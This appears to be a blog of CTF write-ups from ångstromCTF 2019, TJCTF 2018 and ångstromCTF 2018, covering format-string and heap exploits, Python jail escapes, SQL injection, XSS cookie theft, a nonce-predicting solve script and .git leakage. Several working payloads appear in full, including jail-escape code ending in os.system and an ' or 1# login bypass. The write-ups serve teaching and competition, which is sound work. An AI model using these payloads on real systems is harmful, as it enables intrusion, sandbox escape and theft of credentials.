The first step is getting main to loop. The last printf has been changed to puts due to compiler optimizations or something, so the GOT of puts can be overwritten with the address of main and the function will loop. This can be done in a way similar to how this article describes it, although note that since this is 64-bit and the addresses have null bytes, the addresses must go after your format string.

Next you have to leak a libc address - this can be done by popping addresses off the stack (with %x or %p) until you get to __libc_start_main_ret. From this and the libc provided, you can calculate the base address and thus the address of any function in libc.

After this, one last write is required to change strcmp to system, and then /bin/sh can be entered as the item and you have shell.

Server

In this challenge you were given a web server written in assembly. After disassembling the binary, you could see there were several syscalls which allowed the program to listen on port 19303 and fork a new process to serve each connection. You could also see there was a buffer overflow when reading in the path, since it just kept reading until a space.

With this buffer overflow you could modify a syscall and ultimately get RCE.

Weeb Hunting

This was a heap challenge, and I believe there were multiple ways to solve it. Below I’ll describe my solution.

You could get a double free by just using an item twice - the free’d pointer was not cleared, so the check to see if it was an empty slot failed. With this you could create a loop with the fastbins and allocate something that was also on the fastbin list. The fd of this fastbin could be modified to point to a fake fastbin in .bss and that could then be allocated and modified to overwrite a weapon pointer to an address on the global offset table, leaking a libc address when weapon names were printed.

The same attack with a double free could then be used to overwrite __malloc_hook to the win function and get shell.

TI-1337

This challenge gave a highly restrictive Python exec sandbox (no parentheses, no hashtags, no brackets, no imports, etc.). However, it did allow colons and the @ symbol, so classes could be decorated and lambda functions could be made. Using this, you could open the flag file and read it:

x = 111, 112, 101, 110, 40, 39, 102, 108, 97, 103, 46, 116, 120, 116, 39, 41, 46, 114, 101, 97, 100, 40, 41
y = lambda z: x
@print
@eval
@bytes
@y
class z:
	pass
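To see why the decorator stack works, here is the same construction with a harmless stand-in payload (the byte values of the expression 6*7 instead of a file read). Decorators are applied bottom-up, so the class body is irrelevant and the chain reduces to nested calls.

```python
# A harmless stand-in payload: the byte values of the expression "6*7".
x = 54, 42, 55
y = lambda z: x

@eval
@bytes
@y
class z:
    pass

# The decorators above are equivalent to this nested call.
same = eval(bytes(y(None)))
print(z, same)
```

After the class statement, the name `z` is bound to whatever the outermost decorator returned, which is how function calls happen without a single parenthesis in the payload itself.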

Bugger

The binary was packed with UPX (findable with strings), but the packer said it could not unpack it. This was because the UPX! header was replaced with null bytes, so it had to be added back in. There was also a ptrace antidebugging mechanism. Since it made syscalls directly, you couldn’t LD_PRELOAD a custom ptrace function. It also made two calls to make sure it could ptrace successfully once, but not twice. The easiest way to bypass this was to catch the syscall in GDB and modify the return value. The binary then performed some weird calculations (modified SHA512 with some random stuff) to get the flag. The values could be pulled from within GDB with a breakpoint set in the proper place.

Control You

For this challenge you just had to read source (keyboard shortcut: Control-U) and see what it was comparing your entered flag with.

DOM Validator

This challenge had tons of unintended solutions - I’m sure people will make writeups for those. My intended solution was much simpler. Just change the URL from https://dom.2019.chall.actf.co/posts/asdfasdfsadf.html to https://dom.2019.chall.actf.co/posts//asdfasdfsadf.html and the relative source for DOMValidator.js no longer loads (404). This behavior is due to how express’s static file serving works (double slashes are collapsed).

This XSS is then used to steal the admin’s cookie, which has the flag.

NaaS

This challenge required breaking Python’s random number generator to predict nonces.

My solve script (using randcrack):

from randcrack import RandCrack

rc = RandCrack()

import binascii
import base64
import requests

requests.get('https://naas.2019.chall.actf.co/status')

noncehtml = "<script></script>"*156
nonces = requests.post('https://naas.2019.chall.actf.co/nonceify', data=noncehtml).json()["csp"].strip("script-src 'nonce-").strip(";").split("' 'nonce-")

bits = []

for nonce in nonces:
	h = binascii.hexlify(base64.b64decode(nonce))
	for i in range(0, len(h), 8):
		bits.append(int(h[i:i+8], 16))

for i in range(0, len(bits), 4):
	bits[i], bits[i+1], bits[i+2], bits[i+3] = bits[i+3], bits[i+2], bits[i+1], bits[i]

for b in bits:
	rc.submit(b)

print(str(base64.b64encode(binascii.unhexlify(hex(rc.predict_getrandbits(128))[2:].zfill(32))), encoding="ascii"))
print(str(base64.b64encode(binascii.unhexlify(hex(rc.predict_getrandbits(128))[2:].zfill(32))), encoding="ascii"))

GiantURL

This challenge gave a “URL lengthener” that also had a report link, where the admin would visit the lengthened URL and click on the link to follow the redirect.

You needed to change an admin’s password through a POST request to /admin/changepass. At first it looked like this could be done just with CSRF, but that wouldn’t work because the server set its cookies to SameSite=Lax, so the cookie was not sent with cross-origin POST requests.

Instead, you had to use the ping attribute on the link you sent (since the href attribute wasn’t quoted, you could break out of it with a space) and set it to /admin/changepass?password=<some valid password>. Since the PHP used $_REQUEST, both GET and POST parameters were used to get the sent password.

After the admin clicked on the link the admin password would be changed and you could log in and get the flag.

TJCTF 2018

I played TJCTF as part of the team pearl, and we solved every challenge, placing second overall. The Abyss was a Python jail challenge worth 160 points — since I really enjoy this type of challenge, I figured it was worth writing up.

The Abyss

You are able to netcat to a server where you get a Python prompt that execs whatever you enter. However, what you can run is heavily filtered and dangerous functions are filtered from builtins.

The biggest restriction is nothing with __, which prevents most Python jail escapes from working. The solution involves creating a code object, and using that to create a function object that you can run to get the flag.

First you have to get constructors for both code and function objects. This can be done through lambda functions: type(lambda: 0) for functions and type((lambda: 0).func_code) for code objects.

The next step is to create a code object. You can look at the arguments for the constructor with help(type((lambda: 0).func_code)). The parameters can easily be matched up with the properties of the func_code property of any function, so you can just copy them from a function you create locally that does what you want.

Since it can be assumed the goal is to get a shell, all you need is the os module (you can use os.system). The os module can be reached through something like ().__class__.__base__.__subclasses__()[59].__init__.func_globals['linecache'].__dict__['os']. Simply write a function locally that returns that, and create a code object from it with the method described above.

The next step is copying the function properties. Once again, you can do the same thing and just find the properties corresponding to the arguments of the constructor.
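The two constructors can be tried out locally before building the real payload. The sketch below is for Python 3, where func_code is spelled __code__ (so it would not pass the jail's filter as written), and template is a hypothetical stand-in for the function you actually want to smuggle in.

```python
# Constructors obtained from a throwaway lambda, as in the challenge.
function_type = type(lambda: 0)
code_type = type((lambda: 0).__code__)


def template():
    # Hypothetical stand-in for the function you write locally.
    return 6 * 7


code = template.__code__

# Each constructor argument corresponds to a readable co_* attribute,
# which is what makes copying them into a payload possible.
fields = {
    name: getattr(code, name)
    for name in ("co_argcount", "co_nlocals", "co_consts", "co_names")
}

# A function object needs only a code object and a globals mapping.
rebuilt = function_type(code, {})
result = rebuilt()
```

The exact argument list of the code constructor differs between Python versions, so help(code_type) on the target interpreter is the reliable reference.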

During this process you will notice some __ strings, but you can just separate them into single underscores and concatenate so they aren’t noticed. Ultimately, you will get a payload that looks something like:

type(lambda: 0)(type((lambda: 0).func_code)(0, 1, 4, 67, 'g\x00\x00d\x04\x00j\x00\x00j\x01\x00j\x02\x00\x83\x00\x00D]\x1b\x00}\x00\x00|\x00\x00j\x03\x00d\x01\x00k\x02\x00r\x13\x00|\x00\x00^\x02\x00q\x13\x00d\x02\x00\x19j\x04\x00j\x05\x00j\x06\x00d\x03\x00\x19j\x07\x00S', (None, 'catch_warnings', 0, 'linecache', ()), ('_''_class_''_', '_''_base_''_', '_''_subclasses_''_', '_''_name_''_', '_''_re''pr_''_', 'im_func', 'func_globals', 'os'), ('x',), '<stdin>', 'os', 1, ''), {'_''_builtins_''_': globals()['_''_builtins_''_']})().system('cat flag.txt')
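The underscore splitting in the payload above relies on Python joining adjacent string literals at compile time. A small check of that behavior, using one of the names from the payload:

```python
# The text sent to the server, exactly as it appears in the payload.
source_text = "'_''_class_''_'"

# The filter looks at the raw text, which never contains two
# underscores in a row.
contains_double_underscore = "__" in source_text

# Adjacent string literals are concatenated by the compiler, so the
# value seen at runtime is the dunder name again.
runtime_value = eval(source_text)
```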

ångstromCTF 2018

I helped organize ångstromCTF this past week, and it was a huge success with over 1,500 scoring teams. Here are the challenges I wrote:

Sequel

This was a simple SQL injection challenge. One of many ways to solve it is using ' or 1# as the username. If you don’t know why this works, w3schools has a nice overview.
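As a rough illustration of why that username works, here is a sketch with a hypothetical query template; the real challenge's query and column names are assumptions. In MySQL, # starts a comment that runs to the end of the line.

```python
def build_query(username, password):
    # Hypothetical, deliberately vulnerable query built by string formatting.
    return (
        "SELECT * FROM users WHERE username = '%s' AND password = '%s'"
        % (username, password)
    )


query = build_query("' or 1#", "anything")

# Everything from # onward is ignored by MySQL, so this is the part
# that actually gets evaluated.
effective = query.split("#", 1)[0]
```

The quote closes the username string, or 1 makes the condition true for every row, and the comment removes the password check.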

Weird Message

This challenge gave a single text file, containing a message. From the hint xn--, it could be determined that this was punycode. Punycode can be decoded in Python with:

"<string>".decode("punycode")

When you do this, you find that the part of the message after the last dash has been removed, and the one before it has changed. Since punycode appends a dash each time a string is encoded, you know that this was probably encoded many times. Trying to decode again, however, gives an error because of unicode characters. Upon further inspection, the end of the string now has homoglyphs. Replacing these with the similar ASCII characters, the string can be decoded again. However, since there are about 200 dashes, the string was probably encoded 200 times. Decoding by hand would take a very long time. Luckily, this is not too hard to automate. You can either build up a mapping of homoglyphs to regular characters manually, or use a prebuilt list like I did.
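The automation can be sketched roughly as follows, in Python 3 (where the decode is done on bytes rather than on a str). The two-entry homoglyph table and the tiny sample are made up for illustration, and stopping once no dash remains assumes the final plaintext contains no dash.

```python
# Hypothetical homoglyph table; a real solve needs a much larger one.
HOMOGLYPHS = {"\u0430": "a", "\u0435": "e"}  # Cyrillic lookalikes of a and e


def normalize(text):
    """Replace known homoglyphs with their ASCII lookalikes."""
    return "".join(HOMOGLYPHS.get(ch, ch) for ch in text)


def peel_layers(text):
    """Undo punycode layers until no dash is left in the text."""
    rounds = 0
    while "-" in text:
        text = normalize(text).encode("ascii").decode("punycode")
        rounds += 1
    return text, rounds


# Build a small two-layer sample: encode, disguise one letter, encode again.
layer1 = "flag".encode("punycode").decode("ascii")
disguised = layer1.replace("a", "\u0430")
sample = disguised.encode("punycode").decode("ascii")

decoded, rounds = peel_layers(sample)
```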

After decoding fully, you get the flag.

File Storer

You are given a link to an (incredibly ugly) website where you can create accounts and upload files. However, if you try a common name like test for a file, it says the file already exists! This means all files are stored in the same place. Going a step further, the files may be stored in the same place as the rest of the website. Trying to access files/index.py (it can be determined it is Flask from the 404 page) gives a special message, so there are protections against reading it, but this confirms that files are read from the root directory of the website. Through the hint or just knowledge of common web vulnerabilities, you might decide to try accessing files/.git, and, luckily enough, it says the directory exists.

However, the .git directory cannot be downloaded the normal way since there is no directory listing. Instead, you can either manually reconstruct it from files with known names or use a pre-made script to do that. Once you have .git, you can check out the files and see the source of the website.
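Manual reconstruction works because git stores loose objects at predictable paths derived from their SHA-1, each one zlib-compressed with a short header. The sketch below shows only that layout; the helper names are made up, the sample object is built in memory rather than fetched, and packed objects are not handled.

```python
import hashlib
import zlib


def loose_object_path(sha1_hex):
    """Path of a loose object relative to the repository root."""
    return ".git/objects/%s/%s" % (sha1_hex[:2], sha1_hex[2:])


def parse_loose_object(compressed):
    """Split a loose object into its type and its content."""
    raw = zlib.decompress(compressed)
    header, _, body = raw.partition(b"\x00")
    kind, size = header.split(b" ")
    if int(size) != len(body):
        raise ValueError("size in header does not match content length")
    return kind.decode("ascii"), body


# In-memory stand-in for a downloaded object file.
raw_object = b"blob 5\x00hello"
sha = hashlib.sha1(raw_object).hexdigest()
path = loose_object_path(sha)
kind, body = parse_loose_object(zlib.compress(raw_object))
```

Starting from files such as HEAD and the refs it names, each commit object points to a tree and each tree to further objects, so the hashes to request next come out of the objects already downloaded.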

Looking at index.py, you see a “beta feature” that uses getattr to get information about a user. The user class has two attributes: username and __password. Accessing username works just fine, but the password does not! Why could this be? This is the fault of name mangling: inside a class body, Python rewrites an attribute name that starts with two underscores by prefixing it with an underscore and the class name. If you instead access _user__password for admin, you get the flag.
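The behavior is easy to reproduce locally. This sketch uses a stand-in user class with made-up values; only the attribute names come from the challenge.

```python
class user:
    def __init__(self, username, password):
        self.username = username
        # Stored on the instance as _user__password because of name mangling.
        self.__password = password


admin = user("admin", "not-the-real-flag")

plain_lookup = getattr(admin, "username")
# Strings passed to getattr are not mangled, so this name does not exist.
has_unmangled = hasattr(admin, "__password")
mangled_lookup = getattr(admin, "_user__password")
```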

There were also a few unintended solutions involving accessing various files.

The Best Website

You are provided with a seemingly useless website. Upon further inspection, it is a legitimately useless website. However, in the source of index.html you see a comment directing developers to record their changes in log.txt. Visiting log.txt, you see that a super secret flag was added to the database, and there is a timestamp. This will be important later.

Continuing your inspection of the website, you see it makes a network request to /boxes?ids=<id1>,<id2>,<id3>. From either the hint or previous knowledge, you can determine that these are MongoDB object ids. Googling what makes up a MongoDB object id, you find how it is made: a timestamp, a machine ID, a process ID and a counter. The machine ID and process ID are shared with the ids you already have, the counter can just be incremented by one, and the timestamp can be gotten through this useful website (be careful of time zones though).

After reconstructing the object id, substituting it for one of the current ids gives the flag.
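The reconstruction can be sketched like this, assuming the 12-byte layout described above (4-byte timestamp, 3-byte machine ID, 2-byte process ID, 3-byte counter). The function name, the sample id and the counter_offset parameter are made up for illustration.

```python
from datetime import datetime, timezone


def forge_object_id(known_id, timestamp, counter_offset=1):
    """Build an object id from a known one plus a new timestamp."""
    raw = bytes.fromhex(known_id)
    machine_and_pid = raw[4:9]  # shared with the known id
    counter = int.from_bytes(raw[9:12], "big") + counter_offset
    forged = (
        timestamp.to_bytes(4, "big")
        + machine_and_pid
        + counter.to_bytes(3, "big")
    )
    return forged.hex()


# Made-up known id and timestamp, not values from the challenge.
known = "5aa5a8f10a1b2c3d4e000010"
forged = forge_object_id(known, 0x5AA5B000)

# Converting a log time to seconds: set the time zone explicitly
# (UTC is used here as an example) instead of relying on local time.
log_time = datetime(2018, 3, 16, 12, 0, 0, tzinfo=timezone.utc)
forged_from_log = forge_object_id(known, int(log_time.timestamp()))
```

Whether the counter needs to go up or down by one depends on whether the flag was inserted after or before the id you start from, which is why the offset is a parameter.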